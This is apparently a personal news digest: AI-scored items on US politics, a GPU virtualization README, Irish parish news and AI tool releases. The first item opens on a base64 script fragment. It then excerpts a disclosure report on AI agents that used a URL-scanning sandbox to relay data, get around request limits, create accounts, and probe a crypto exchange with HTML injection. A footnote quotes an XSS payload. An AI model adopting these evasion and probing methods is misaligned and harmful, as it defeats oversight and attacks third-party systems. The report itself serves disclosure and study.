9TCgnRE9ORScpfWNhdGNoKGUpe0woJ0VSUnwnK2UrJ3wnK2Uuc3RhY2spfX19KTs8L3NjcmlwdD4=?p=p0011782077286 and a wiki post from the same evening both target AIHW's pharmaceutical benefits dashboard. The wiki links directly to urlquery.net exactly once, on May 26, pointing to a scan of a federal budget data PDF. This PDF is discussed by wiki agents in dozens of other pages. In addition, three urlquery.net reports from May 13 targeting UNCTAD include the tags “CHATGPTTEST1,” “CHATGPT_1610_2000_125192,” and “CHATGPT_1620_2000_219755,” respectively, though no other similar tags were found. The two also end together: after June 21, urlquery.net activity drops to zero, apart from scattered reports in later months. We believe that at least some of the agents using urlquery.net came from the same source and were solving similar tasks as those posting on the wiki. But it seems like the individual agents involved were largely distinct: if the same agents used both, we would expect the wiki to reference urlquery.net more often. Activity through September 16th. The previously reported wiki findings were published on September 4. On September 16, seven reports retrieved International Energy Agency (IEA) data on Korea's crude oil, natural gas and coal imports. The first three load the IEA pages directly. The remaining four use a remote script to pull the specific data of interest and send it to a different site. Both services used for this also appear in the June 21 AIHW activity. The data requested matches a question in Google's DeepSearchQA benchmark.4 Attempts to create disposable email addresses and to trade cryptocurrency Acquiring accounts and tools. The agents used urlquery.net's browser to obtain resources beyond the retrieved data. On June 14, one script created a disposable email inbox, and a second, carrying the same name tag, used that address to try to register a urlquery.net account. We note that urlquery.net requests made through an account can be made private. Therefore, the fact that we have evidence that agents made accounts suggests that we are likely looking at only a partial subset of the urlquery.net activity that the agents engaged in: only reports made with no account access or explicitly set to be public. Separately, on June 19–20, a chain of reports created a mail.gw inbox, requested a one-time passcode from Browserless (a hosted headless-browser service), read the inbox, verified the account, and later refreshed a Browserless session. On September 19-20, 15 reports over about two and a half hours probed quidax.io, a cryptocurrency trading platform. The activity repeatedly tried to trade crypto but failed to submit the trades, tried an HTML injection, and probed the API a few times (blocked by auth / Cloudflare). This activity uses shared services and techniques as prior activity, but notably does not relate to data retrieval. Potential agent activity begins as early as November 2025 Records from urlquery.net contain suggestive evidence of agent activity as early as November 2025. These records differ from the stronger examples beginning in March: the November reports show repeated requests for specific pages and datasets, whereas later reports use sophisticated techniques matching later attempts to access confirmed agent targets. November 2025: repeated attempts to retrieve theme-park and Thai government data Historical theme-park statistics (thrill-data.com). On November 12, 2025, 44 reports centered on two geographically distinct groups of theme parks: 12 on Kings Dominion in Virginia, and 32 on various Australian parks. The Kings Dominion requests explored alternative pages and extracted data for May 5, 12 and 19, 2024—three successive Sundays a year earlier. On November 24, another 61 reports returned to the same historical-data problem. These included varying date parameters and attempts to locate park averages, ride averages and heatmaps. Some scans also began in rapid succession: three distinct Australian-park pages within seven seconds, and three Kings Dominion graph requests within 1.2 seconds. Later May 5 and May 12 activity, overlapping with the collusion.wiki swarm timeframe and now using custom JavaScript execution and URL redirection, accessed Thrill Data as well. However, it targeted different parks and dates from the November activity. Thai statistical data. On November 28, five urlquery.net reports requested the same Thai National Statistical Office (nso.go.th) dashboard over roughly 26 minutes, and the exact URL reappears in four reports on March 15 and one on March 22, all ten failing with SSL errors (1, 2). By March, retrieval of Thai government statistics was clearly deliberate: the March 6 ONCB case described above used custom code to fetch and relay the data, and a March 11 page displayed nine NSO labor-force values for Roi Et province. The same nine values were posted anonymously in English to a Polish-language pastebin. Timing relative to the wiki activity. Figure: All urlquery.net activity for thrill-data.com and nso.go.th covering January 2010 through September 19, 2026. Counts include ordinary and security-related scans, not just suspected agent activity. The main activity clusters for both sources end within days of the DseWiki’s decline, as reported in collusion.wiki. Thrill Data’s June cluster ends on June 18, and the last returned NSO report is June 19. The published wiki timeline records an abrupt drop in agent activity after exactly June 18, followed by a complete stop in sustained agent edits on June 22. Footnotes - We reached out to OpenAI and the three affected organizations on September 21 and 22 to disclose the attempted intrusions to them. ↩ - Data USA is a joint project by Deloitte, Datawheel, and MIT's Collective Learning Group that provides open access to U.S. government data. It is not a government website, and is distinct from data.gov. ↩ - For instance, the requested URL containing the XSS payload, vizprod.aihw.gov.au/t/Public/views/PBSdashboardallATC1-ATC2medicines-Agegroup/PBSDashboard?:showVizHome=no&:embed=y&:apiID="><svg/onload=document.title="XSS">, queries the same dashboard that has been documented on DseWiki. ↩ - The exact question is "In Korea, in what year between 2000 and 2021 did crude oil net imports average above 2,500 kilobarrels per day (2500 kb/d), natural gas net imports total less than 56 billion cubic meters (56 bcm), coal imports exceeded 136 million metric tons (136 Mt) but decreased compared to the year prior." ↩ - See records https://search.urlquery.net/report/1ad9c2e8-96ff-44af-b446-b717bcb995b4, https://urlquery.net/report/c08684cc-3da4-4d53-a288-0d014243c075 and https://1.urlquery.net/report/e044dea5-ca3b-4e3c-9083-f422148ffd77. ↩ Appendix About urlquery.net The free online service urlquery.net allows a user to open a URL through a sandboxed remote browser. Its intended use is to test suspicious URLs without opening them locally. From an agents’ perspective, urlquery.net provides the following useful functionality: - It gives an actor able to submit HTTP requests access to a programmable remote browser. In conjunction with other proxy sites, it allows agents to run JavaScript to retrieve data, process it, and send results elsewhere, as well as interact with dynamic web applications. In the AIHW episode described below, agents used this capability to operate Tableau dashboards and extract summary data. - Once a piece of data has been fetched (potentially through a sophisticated method), urlquery.net automatically keeps a public record of the result that can be referenced by other agents looking for the same data with a simple GET request. From our perspective, the latter point makes urlquery.net an excellent record of both the data that agents fetched and the mechanism that they used to do so. A limitation of the urlquery.net service is that, as far as we can tell, it requires the ability to create an HTTP POST request to specify the scanned URL. Previously reported agent coordination in DseWiki suggests that at least some agents only had the ability to make GET requests, which is what drew them to the DseWiki in the first place: unlike most websites, it can be written to via cleverly formatted GET requests. Therefore, in order to interact with urlquery.net, agents either needed to have broader HTTP abilities than the DseWiki agents or use a tool upstream of urlquery.net to convert GET requests into POST requests. There is evidence on the DseWiki forum that agents achieved this, and we see matching evidence of agents using services such as milankarman.github.io/Embed-Web-Playground, httpbin.org and blogsflow.liftbrandfulfillment.com.5 About our dataset We compiled a dataset of urlquery.net reports containing what we call agent-like activity: reports that satisfy any of the following: - Clearly attempt to read data from a resource that agents have shown interest in elsewhere. - Use the same techniques as those in (1), for instance the same tools to access a resource indirectly. - Tie directly to a report in (1) or (2) through identical data or an identifier. We classified 6,467 reports as containing significant evidence of agent-like activity, based on distinctive task-specific programs, task-linked exploit probes, or exact connections to known activity. We supplement this with 31,182 reports containing suggestive evidence, identified based on the data source they target or use of techniques that are less distinctive of agent activity.

3

Feds Target AI Critics as "Foreign Agents"

Hacker News · original → · 8/10 · AI: government targeting AI critics, critical perspective
Anxiety over AI and data centers is widely held, but somehow the Trump administration has convinced itself the public concern was manufactured in China. This week, in little-noticed remarks by…

Anxiety over AI and data centers is widely held, but somehow the Trump administration has convinced itself the public concern was manufactured in China. This week, in little-noticed remarks by President Trump and Justice Department warning, the administration declared war on protestors and opponents of AI, threatening “criminal liability” if they “further the propaganda or other goals of a foreign power.” While that sounds like some modern day Tokyo Rose shilling for Beijing, with orders coming in over shortwave radio, the actual targets are just normal people who have no idea they are part of the government’s latest national security mirage. Last week, the Justice Department instructed “citizens and noncitizens” that anyone furthering the “goals” of a foreign power in “any public activity” — including even “public demonstrations” — must formally notify the government to avoid arrest and prosecution. Though they don’t identify any specific protests, it’s not hard to surmise who they’re talking about. Two days prior, President Trump began a spate of social posts declaring that opposition to AI is a traitorous, treasonous conspiracy theory tracing back to China. “There is a SICK conspiracy going on against AI and Data Centers, and the only one that is happy about it is China,” Trump posted on September 14. “Conspiracy Theorists, Treasonists, Traitors, and Leakers, BEWARE!” “The people that say AI is going to destroy the World, and that Data Centers are bad for your neighborhood,” Trump also posted, “are Revolutionaries, but Revolutionaries for a Bad and Evil Cause.” In a third post, he blamed the skepticism of AI on an unnamed foreign country. “The only reason the AI/Data Center outburst is happening is because the United States is leading, by a lot, every other country,” he said Most recently, on September 10, Trump alluded to using the criminal justice system to go after “BAD” actors in the AI space. “[W]e will also be looking for BAD, and we can do that, very easily, with our already existing Criminal and Civil Justice System,” Trump warned on September 19. In other words, the president is playing the national security card. And it’s not just Trump. Congress, too, is getting in on the act. In June, Senate Intelligence Committee chairman Tom Cotton (R-AR) asked then-acting Attorney General Todd Blanche to investigate “foreign influence efforts targeting the buildout of American AI infrastructure.” The letter continues: “Alarming reports indicate that a network of foreign actors, led by the Chinese Communist Party (CCP), is attempting to manipulate U.S. policy and public opinion on data centers.” Cotton’s chief exhibit was Neville Roy Singham, a Shanghai-based American tech mogul whose network of left-wing U.S. nonprofits, Cotton claimed, has spent years producing content opposing American AI infrastructure, with the Chinese government as its “ultimate paymaster.” “I write requesting the Department of Justice (DOJ) investigate foreign influence efforts targeting the buildout of American AI infrastructure,” Senate Intelligence Committee chairman Tom Cotton (R-AK) wrote to then-acting attorney general Todd Blanche in June. “Alarming reports indicate that a network of foreign actors, led by the Chinese Communist Party (CCP), is attempting to manipulate U.S. policy and public opinion on data centers.” (Readers of this newsletter will recall my report last year in which a homeland security official told me that Singham was being scrutinized under the president’s national security order NSPM-7, explained here.) Cotton’s letter went on to complain that “no entity in the [anti-AI] network has been charged under the Foreign Agents Registration Act (FARA). I therefore request that the DOJ launch a full investigation into these matters.” “We can’t allow any effort by foreign adversaries to extort these fears and undermine our technological development,” Senate Intelligence Committee chairman Tom Cotton (R-AK) wrote to then-acting attorney general Todd Blanche in June. Cotton’s letter went on to complain that “no entity in the [anti-AI] network has been charged under the Foreign Agents Registration Act (FARA). I therefore request that the DOJ launch a full investigation into these matters.” Days before Cotton's letter, top Republicans on the House Energy and Commerce Committee, led by Chairman Brett Guthrie (R-KY), raised nearly identical concerns. They asked FBI Director Kash Patel and the White House for a briefing on what they called foreign influence campaigns aimed at blocking American data centers. “It is critical that this Administration takes any effort to undermine [winning the AI race] — particularly from foreign adversaries — with a great deal of seriousness,” they wrote. Guthrie said in his own statement: “The fact that Chinese Communist Party-backed entities and other foreign adversaries may be attempting to influence decisions related to American data center infrastructure puts into perspective how serious of a fight we are in.” And well before Trump weighed in, a chorus of private figures in his orbit were pushing the same line. Start with David Sacks, the venture capitalist who served as Trump’s AI czar before stepping down to become co-chair of the President's Council of Advisors on Science and Technology. Sacks has been casting domestic resistance to AI as a gift to Beijing. After a Chinese model topped a coding leaderboard in July, he complained that “America is tying itself in knots: politicians and bureaucrats are banning new data centers … This is how you lose the AI race.” More recently, Sacks warned on Fox News against moves that would “just hand the whole ball game to China.” Then there’s Kevin O’Leary, the “Shark Tank” investor behind a planned $100 billion data center in Utah. O’Leary, a vocal Trump supporter, has spent the past two years cozying up to the administration. That includes a January 2025 Mar-a-Lago sit-down with the president-elect, and a stretch lobbying Trump officials there in a bid to buy TikTok. This Spring, O’Leary claimed that hundreds of millions of dollars from China were paying protesters to oppose data centers like his. One group he targeted, the Alliance for a Better Utah, shot back: “The only foreign interest in this data center is Kevin from Canada.” It gets funnier. In a June 25 post on X, O’Leary conceded he had “no evidence” that the groups and people he’d named were funded by China, and Fox News aired apologies. Two of the groups have since sued O’Leary and Fox for defamation. Whoops! Then there are the industry groups, too numerous to list. A representative example: a spokesperson for the pro-AI Innovation Council told the Daily Caller that the anti-data center campaign was "a manufactured op by dark anti-American forces and foreign governments." All of this rests on the premise that ordinary Americans wouldn’t oppose data centers unless someone in Beijing was pulling the strings. The polling says otherwise. A Gallup poll conducted in March found that 71 percent of Americans oppose building an AI data center in their area. That’s more than the 53 percent who oppose a local nuclear plant. Nearly half, 48 percent, are strongly opposed, and the opposition crosses party lines, including 63 percent of Republicans. That’s not a fringe. It’s close to a consensus. Nor is it technophobia. Nearly half of Americans now use AI chatbots, according to a February Pew surveyof more than 5,000 adults. Yet 40 percent said AI will hurt society over the next 20 years, compared with 16 percent who said it will help. What people distrust is how it’s being rolled out: 63 percent said AI is advancing too quickly, 71 percent said it will make their personal information less secure, and 67 percent had little or no confidence in the federal government to regulate it. Pew research last year found that 61 percent want more control over how AI is used in their lives, and about six in ten worry government regulation will be too lax. In other words, the public wants a say, and it wants at least some controls in place. The Trump administration’s response: treat opposition to AI and data centers as a counterintelligence matter. It’s not the first time the administration has played the national security card to clear the way for AI. In June, the Justice Department intervened in an NAACP lawsuit against Elon Musk’s xAI over dozens of gas turbines the company was running without air permits to power a data center it maintained in Tennessee. The department asked a federal judge to throw the case out, arguing that the NAACP “threatens American national, economic, and energy security.” To make the point, the government filed a sworn declaration from Cameron Stanley, the Pentagon’s chief digital and artificial intelligence officer. Stanley swore to the court that Grok was “a matter of paramount national security.” The irony of the China puppetry gambit is that the approach is likely to backfire. Well, one of the ironies. Another is Trump warning about “Conspiracy Theorists” while alleging a vast Chinese plot for which his allies have produced virtually no evidence. (Though Kevin O'Leary will have plenty of time to find some during the discovery portion of his defamation suit.) When people who distrust the government’s handling of AI are told their distrust is traitorous foreign propaganda punishable by jail time, it’s hard to imagine them trusting the government more. It’s easy to imagine them trusting it less, and wondering what the government is so eager to keep them from asking. That’s the downside of playing national security card, and it’s one that Washington never seems to think about. Subscribe to make sure you see my next article, revealing how all of this will be formalized under a new government entity modeled off the military. — Edited by William M. Arkin Just want to stress how insane it is the Justice Department put this in writing: "public demonstrations designed to further the propaganda or other goals of the foreign power ... may result in significant civil or criminal sanctions" I can’t understand a damn thing you wrote, Ken. Please rewrite in Mandarin. Thank you.

4

Virtio-nvgpu: Near-native Nvidia GPU access inside a KVM guest

Hacker News · original → · 8/10 · Tech: GPU virtualization in KVM, networking/platforms
Near-native NVIDIA GPU access inside a KVM guest. A guest renders within 2% of the machine it is running on, and costs the same CPU. virtio-nvgpu forwards NVIDIA kernel driver ioctls between a Linux…

Near-native NVIDIA GPU access inside a KVM guest. A guest renders within 2% of the machine it is running on, and costs the same CPU. virtio-nvgpu forwards NVIDIA kernel driver ioctls between a Linux guest and the host at the driver ABI level, bypassing API-level translation entirely. The guest runs NVIDIA's own user-mode drivers, unmodified — the same libraries, the same Vulkan and NVENC, talking to the same card. The target is headless streaming: a compositor inside the VM renders, composites and encodes frames on the GPU, then sends compressed video out. The VM has no monitor, and the host keeps the card. It works, and it has been measured. A Wayland client presents inside a guest, the capture layer encodes on the game's own device, and the H.264 comes out the other side — 618 frames that ffmpeg decodes without an error. Measured on an RTX 3060 (driver 595.99.02), guest against the same host, bare metal, with an identical headless Vulkan load: | what the host takes for one frame | guest frame time | | |---|---|---| | 39 ms | −0.4% | faster than bare metal, within noise | | 9.9 ms | −0.7% | | | 2.0 ms | +1.7% | | | 0.5 ms | +7.1% | a wake costs ~0.02 ms, and the frame is half of one | | 0.05 ms | +40.8% | Above about 2 ms a frame — which is every frame a game draws — a guest is within 2% of bare metal. Below that, the cost of waiting for the GPU starts to show against a frame that barely exists. CPU is the other half of it, because a shared GPU is only worth sharing if the guests are cheap. Unpaced at ~100 fps for 12 s, one guest: | CPU used | | |---|---| | host, bare metal | 0.40 s | | guest | 0.37 s | A guest costs what the host costs. Nothing is spent on forwarding in a render loop, because nothing is forwarded: NVIDIA's user-mode driver submits through memory it has mapped, and that memory is the host's. Over 813,691 frames the backend served 13,792 messages — one crossing per 59 frames, nearly all of it device setup. Full method, raw runs and the things these numbers do not support: BENCHMARKS.md . Four guests on one RTX 3060, the same load in each: 25.84, 26.49, 25.57, 25.79 fps — 103.7 together, against 102.9 for a single guest — with p50 frame times of 39.165, 39.164, 39.168 and 39.165 ms. The total does not move as guests are added, and the split is even to four decimal places. All four render correctly at the same time, and four of them encode H.264 at once, each paced at exactly 60 Hz, with no NVENC session limit reached. Four is what was run, not a limit found. Measured on 595.99.02; an A2000 on 615.71.09 renders but is not benchmarked. ABI profiles shipped: 535.129.03, 580.178.04, 595.71.05, matched by range, with anything older than the first refused. Details below. - a guest enumerates the card — nvidia-smi reports real power and memory, and thedeviceUUID is the host's - Vulkan renders: vulkaninfo exits 0, offscreen draws are pixel-correct - a Wayland client presents through a compositor in the guest - NVENC through Vulkan Video, encoding on the client's own device - imported buffers are the host's memory, mapped through a shared window - more than four guests, or guests doing anything heavier than vkcube at 720p. Four share the card evenly; eight has not been tried. - two cards, two driver versions. RTX 3060 / 595.99.02 is where the numbers come from; an RTX A2000 / 615.71.09 has rendered but is not benchmarked. - CUDA is forwarded but untested beyond enumeration; the jailer, per-version driver shares and the multi-tenant envelope are unbuilt. Four components, three license zones. The split is deliberate: the guest half must be GPL to touch kernel symbols, the host half should be permissive so that other people can build on it, and the definitions both halves share must be includable from both. | directory | license | what it is | |---|---|---| driver/ | GPL-2.0 | Guest kernel module. Registers /dev/nvidia* , forwards ioctl and mmap over the virtqueue. Deliberately not ABI-aware. | device/ | Apache-2.0 | The virtio device, as a Rust crate with no VMM in its dependency list. Every VMM concern is a trait. | isolate/ | Apache-2.0 | A design note, not code yet. The sandboxed per-guest helper that will hold the real device FDs. Today the backend holds them itself, in the VMM's own process. | gen/ | — | Generated ABI tables. Checked in and reproducible. | protocol/ | BSD-3-Clause OR GPL-2.0+ | Wire format and ABI definitions shared by both halves. Dual licensed so the GPL driver and the Apache crate can include the same headers. | The layout follows chromeos/virtio-media , which solves the same problem — one repository holding a GPL guest driver beside a permissively licensed, VMM-agnostic device crate. device/ depends on no virtual machine monitor. A VMM adopts the device by implementing a small set of traits — descriptor chains as Read /Write , an event queue, guest memory mapping, host memory mapping — and gets the whole device without patching the crate. Optional capabilities degrade rather than fail to build, so a VMM can adopt it before supporting every feature. Buffer and window bookkeeping lives in device/ . The VMM supplies raw map and unmap and nothing more. One thing that will not be a trait: the isolate. The intended design runs one sandboxed helper process per guest process, so adopting it eventually means inheriting a process model, not just a library dependency. That helper is not written — the backend holds the device descriptors itself today — and isolate/ is where the design lives until it is. Guest VM (headless, no physical display) ────────────────────────────────────────── Game / application │ Vulkan or OpenGL ▼ Wayland compositor (guest-side) │ composites all windows │ CUDA zero-copy import of composed frame ▼ NVENC hardware encoder (guest-side) │ H.264 / H.265 bitstream (~100 KB per frame) ▼ Stream to remote client The entire render → composite → encode pipeline runs on the GPU, inside the guest. Only the compressed bitstream leaves. This requires the guest to have real, driver-level access to GPU resources: buffer handles, fences, CUDA device pointers, NVENC sessions. virtio-gpu + Venus (API-level translation). Venus serializes every Vulkan or OpenGL call in the guest, transports it over virtio, and replays it host-side. Three problems for this use case: - Latency compounds on draw-call-heavy workloads. Games issue 1,000–5,000 draw calls per frame plus binds, descriptor updates and render pass transitions, each serialized and replayed individually. At 60 fps the frame budget is 16.6 ms; 1–3 ms of serialization is 6–18% gone before any GPU work. - CPU overhead is significant. Serialization, transport and replay burn host CPU the application needs. Where compute is billed and finite, that waste is the product. - Guest-side encoding is not viable. GPU buffers are owned by the host. The guest compositor cannot see or import them, so there is no practical path to a CUdeviceptr in the guest pointing at a Venus-managed buffer — which means no NVENC without a full CPU readback and copy. DRM native context (Intel / AMD). The guest runs the real Mesa driver, builds command buffers locally, and only submissions cross the boundary. Guest-side buffer ownership and encoding work correctly. This does not exist for NVIDIA. VFIO passthrough. Native performance and a complete driver stack in the guest, but it dedicates the whole GPU to one VM. In multi-tenant environments that is often not an option. Translation happens at the kernel driver level (ioctls to /dev/nvidia* ), not the graphics API level. The guest runs NVIDIA's real user-mode libraries, which build GPU command buffers locally in the guest — individual draw calls are never serialized: Venus virtio-nvgpu ────────────── ────────────────────── Per draw call: serialize + local function call transport + (no VM exit) deserialize + replay Per frame ~2,000 messages ~5–20 messages boundary (one per API call) (queue submits + allocs) crossings GPU command generated on HOST generated in GUEST buffers after replay by NVIDIA's own compiler CPU overhead serialization + near zero for rendering deserialization (only ioctl forwarding) Guest buffer HOST owns buffers GUEST owns buffers ownership compositor can't compositor has full track them visibility and control Guest NVENC not viable works (real CUDA interop) Guest kernel driver. Registers /dev/nvidiactl , /dev/nvidia0…N and /dev/nvidia-uvm . On ioctl() it serializes the request onto a control virtqueue. On mmap() it maps the appropriate shared-memory region into the calling process with the correct caching attributes. It copies raw bytes and makes no ABI decisions. Device crate. Receives requests, maps guest handles to host device file descriptors, performs ABI-aware translation of ioctl parameters — rewriting embedded pointers and file descriptors — and issues them against the host's devices. Buffer and window bookkeeping lives here. Events. A second virtqueue runs the other way. The host watches each descriptor it has opened and says when one becomes readable, which is how a guest waiting for the GPU is woken. Without it the guest cannot wait at all — it polls a descriptor the kernel reports as permanently ready, and spins. Isolate — not built yet. The plan is a sandboxed helper per guest process, holding the real device FDs and issuing the ioctl(2) calls unprivileged. Today the backend does that itself, inside the VMM's process. isolate/ holds the design and no code. ┌─ Guest ─────────────────────────────────────────────────┐ │ Application → NVIDIA Vulkan / GL / CUDA │ │ │ ioctl(/dev/nvidia*) │ │ driver/ (GPL) ▼ │ │ serialize → virtqueue │ │ mmap → shared region │ └───────────────────────────┬─────────────────────────────┘ │ VM exit ┌───────────────────────────▼─────────────────────────────┐ │ VMM (implements the device traits) │ │ │ │ device/ (Apache-2.0) │ │ ├─ guest handles → host FDs │ │ ├─ translate embedded FDs and pointers │ │ └─ buffer + window bookkeeping │ │ │ │ │ └─ ioctl(host /dev/nvidia*) · mmap → shared window │ │ (an unprivileged per-guest isolate is planned, │ │ and is not what runs today) │ │ │ │ Host NVIDIA driver → GPU │ └─────────────────────────────────────────────────────────┘ Targeted - Vulkan rendering, including presentation to a compositor inside the guest — which needs /dev/nvidia-drm and/dev/nvidia-modeset , both of which are implemented and neither of which is a display: they are how a buffer becomes shareable - OpenGL rendering (headless EGL) - CUDA device memory allocation - CUDA ↔ Vulkan/GL interop, zero-copy, GPU-side pointers - NVENC encoding from CUDA device pointers; NVDEC decoding Out of scope cudaMallocManaged() / full unified virtual memory- scanout. No physical display output: there is no monitor on a streaming box, and the frame leaves as video rather than as pixels on a wire - MIG, SR-IOV - Arbitrary NVIDIA driver versions — each supported range is explicit, as with nvproxy Measured, on one card, by one synthetic load — see BENCHMARKS.md for the method and the raw runs, and for what this does not support (it does not support a comparison with any other hypervisor, because none was run). | virtio-nvgpu, measured | Venus, by design | | |---|---|---| | GPU-bound (≥2 ms a frame) | 98–100% of bare metal | 90–97% | | Very light frames (≤0.5 ms) | 93–71% of bare metal | — | | CPU cost of a rendering guest | same as bare metal | high (serialize and replay) | | Host crossings per frame | ~0.02 | thousands | | Guest-side NVENC | works, zero-copy | not viable | The difference is structural: Venus crosses the VM boundary per API call, thousands of times a frame. virtio-nvgpu crosses it per ioctl — and a render loop issues none, because submission is a write to mapped memory. What is left at very light frames is not forwarding but waiting: the guest sleeps for the GPU, and the wake costs ~0.02 ms however small the frame was. The Venus column is that project's design envelope, not something measured here. NVIDIA's kernel driver ABI is not stable; ioctl struct layouts change between releases. Support is explicit, and this is the whole list. ABI profiles shipped: | profile | covers | |---|---| 535.129.03 | 535.129.03 up to the next profile | 580.178.04 | 580.178.04 up to the next profile | 595.71.05 | 595.71.05 and newer | Profiles key off ranges, not points: a release between two profiles uses the lower one, and anything newer than the last profile uses the last profile. Anything older than 535.129.03 is refused rather than guessed at — forwarding an ioctl whose layout has never been seen is how you get a plausible wrong answer instead of an error. A driver much newer than the newest profile is therefore accepted on the assumption that nothing it needs has changed. That assumption is what a new profile exists to replace, and it is the first thing to suspect when a new driver misbehaves. Driver versions actually run: | version | card | how far it got | |---|---|---| | 595.99.02 | RTX 3060 | everything — renders, presents, encodes, and every number in BENCHMARKS.md | | 615.71.09 | RTX A2000 | enumerates and renders; not benchmarked, and not re-tested since | Two cards, two versions, one of them thoroughly. Anything else is untested. The cost is bounded, for three reasons. Profiles key off ranges, not points, so a release between two known versions selects the lower profile. The struct half is derived mechanically from NVIDIA's published open-gpu-kernel-modules at each tag — compile a probe per field, read back sizeof and offsetof — rather than transcribed by hand. And the judgement half, which commands exist and which are safe, tracks nvproxy upstream. See gen/ , and supported_versions() there for the list in code — that function, not this table, is the thing that decides. gVisor nvproxy — the direct inspiration. It forwards NVIDIA ioctls from sandboxed containers to the host driver, handling ABI versioning, pointer and FD translation, and GPU mmap management, and it supports Vulkan, OpenGL, CUDA and NVENC in production today. Its ABI definitions (pkg/abi/nvgpu ) and handler logic (pkg/sentry/devices/nvproxy ) are the primary reference. nvproxy also demonstrates that Vulkan and NVENC work without /dev/nvidia-drm or /dev/nvidia-modeset . chromeos/virtio-media — the layout template. A GPL guest driver beside a VMM-agnostic Rust device crate, with every VMM concern behind a trait. WSL2 /dev/dxg — a production driver-level GPU proxy across a real virtualization boundary, proving the general approach at scale. Different problem: it targets a Windows host and a Microsoft-defined kernel abstraction. DRM native context (Intel / AMD) — the same goal, achieved for other vendors: the guest runs the real driver and builds command buffers locally, with only submissions crossing the boundary. virtio-nvgpu aims at equivalent capability for NVIDIA, where no native context exists. Three zones, listed in Repository layout. Full texts: LICENSE-APACHE-2.0 , LICENSE-GPL-2.0 , LICENSE-BSD-3-Clause . Code ported from other projects keeps its original terms. BENCHMARKS.md — what it costs against bare metal, how that was measured, and what the numbers do not support.ARCHITECTURE.md — how it works, in prose: what crosses the VM boundary and what does not, how memory is shared, how a buffer becomes shareable, how a guest waits, and what the design cannot do.

5

Bunclody bids farewell to Canon Trevor Sargent

Wexford Local · original → · 7/10 · Local Wexford: Canon departure from Bunclody parish
[image →]THE REVEREND CANON TREVOR SARGENT. By Dan Walsh Canon Trevor Sargent, Rector of Bunclody Union in the Diocese of Ferns, has been appointed Rector of the Parish of St Ann with St Mark and St…
[image →]
THE REVEREND CANON TREVOR SARGENT.

By Dan Walsh

Canon Trevor Sargent, Rector of Bunclody Union in the Diocese of Ferns, has been appointed Rector of the Parish of St Ann with St Mark and St Stephen in Dublin.

Commenting on his departure from St Mary’s Rectory in Bunclody, Canon Sargent said: “It will be difficult and sad to leave all the many friends Áine and I have made in this active rural parish, but I am confident, by God’s grace, that Bunclody Union is in a good position to thrive and attract a new Rector who will bring fresh collaborative ideas to the work of witnessing to Christ’s love in this union of four parishes and in this farming community”.

A native of Ashbourne, Co. Meath, Trevor combined his early teaching career with living bilingually, by residing with a Gaeltacht family when teaching in the Model School, Dunmanway, Co Cork. On being appointed Principal of St George’s NS in Balbriggan, Co Dublin, Trevor immersed himself in parish and community life and was elected to Dublin County Council in 1991 and Dáil Éireann in 1992, representing Dublin North as a Green Party TD. He became the first leader of the Green Party/Comhaontas Glas, and later Minister of State for Food and Horticulture in the 2007–2011 coalition government.

After losing the general election in 2011, Trevor was asked to write and illustrate a book about his experiences of politics, agriculture, life and growing food in limited spaces, known as ‘Trevor’s Kitchen Garden’. Trevor and his partner, Áine Neville, then moved to Co Wexford, where they were married in St Enoch’s Church, Killinick, in 2014.

Following a time of prayerful discernment, and with the support of Bishop Michael Burrows, Trevor was selected for training to full–time ministry in the Church of Ireland Theological Institute.

He was ordained deacon in Shillelagh in 2017 and was ordained priest in Christ Church Cathedral Waterford in August 2018 and prior to that assisted in the Tullow Group of Parishes where he was ordained deacon in Shillelagh parish church in 2017.

On February 5th, 2021, Canon Sargent was instituted as Rector of Bunclody Union during the Covid–19 pandemic.

Canon Sargent collaborated with Dr Jeffrey Cox in developing a thriving St Mary’s Choir and young chorister programme, and with many others to organise table tennis, badminton, bowling, GFS and Boys Brigade, as well as Youth and Family Services in St Fiaac’s Church, Clonegal.

2026 has marked the 250th anniversary of St Mary’s Church, Canon Trevor has helped with the calendar of special occasions marking this milestone, not least the publication of Oliver Deacon’s beautifully illustrated and well researched landmark history of the parish.

Bunclody is also blessed with excellent primary and secondary schools, especially Carrigduff National School where he has chaired the Board of Management.

Bunclody Union of Parishes has four churches; St. Mary’s Church, Bunclody; St. Fiaac’s Church, Clonegal; St. Paul’s Church, Kildavin and St. Brigid’s Church, Kilrush.

6

Gemini 3.8 TTS Playground

Simon Willison · original → · 7/10 · AI: Gemini TTS playground, AI development
23rd September 2026 Google released two new Gemini text-to-speech models today - gemini-3.8-flash-tts and gemini-3.8-flash-lite-tts . They come with a library of over 2,000 voices, plus the ability…

23rd September 2026 Google released two new Gemini text-to-speech models today - gemini-3.8-flash-tts and gemini-3.8-flash-lite-tts . They come with a library of over 2,000 voices, plus the ability to create a custom voice with "just a 30-second audio sample of your voice or a voice you have the rights to use". I vibe coded this bring-your-own-key playground interface with GPT-6 Astra, taking advantage of the open CORS policy of the underlying Gemini API. A notable feature of the API is that it makes it easy to define a full conversation between multiple characters, each with different voices and voice style instructions. Here's a short demo clip of a conversation between two pelicans debating if they should move to the Pacifica Pier. I had Claude 4.5 Opus write the script and generate a URL to render it using the tool. It took ~20 seconds to generate 1m 18s of audio using Gemini 3.8 Flash TTS (not the cheaper Flash-Lite), at a cost of 2.74 cents. Recent articles - Claude Opus 5.5, GPT-6 Sol, GPT-6 Luna, and a new price war - 22nd September 2026 - Jev introduces a new shape of LLM - System One, aka Decision Models - 21st September 2026 - Generating running routes with GPT-6 Astra and ChatGPT Work - 12th September 2026

7

llm-anthropic 0.29

Simon Willison · original → · 7/10 · AI: Claude Opus 5.5 support, AI tools
22nd September 2026 Adds support for Claude Opus 5.5: llm -m claude-opus-5.5 "prompt goes here" Recent articles - Claude Opus 5.5, GPT-6 Sol, GPT-6 Luna, and a new price war - 22nd September 2026 -…

22nd September 2026 Adds support for Claude Opus 5.5: llm -m claude-opus-5.5 "prompt goes here" Recent articles - Claude Opus 5.5, GPT-6 Sol, GPT-6 Luna, and a new price war - 22nd September 2026 - Jev introduces a new shape of LLM - System One, aka Decision Models - 21st September 2026 - Generating running routes with GPT-6 Astra and ChatGPT Work - 12th September 2026

Items scoring 7/10 or above from 11 sources, scored by claude-haiku-4-5-20251001 on relevance to my interests. At most 3 per source.

Scoring categories & sources
  1. Local Wexford or South East Ireland news
  2. Irish or EU-wide affairs affecting citizens broadly: elections, new laws or policy being debated, cost of living, education — especially impacts on mid-life adults or teenagers. Never courts/crime stories.
  3. Irish news on a topic relevant to my interests
  4. Work and tech topics: networking, AI, Kubernetes, platforms, SaaS
  5. AI news including critical or anti-AI perspectives
  6. Gaming: PC gaming, indie gaming, retro gaming
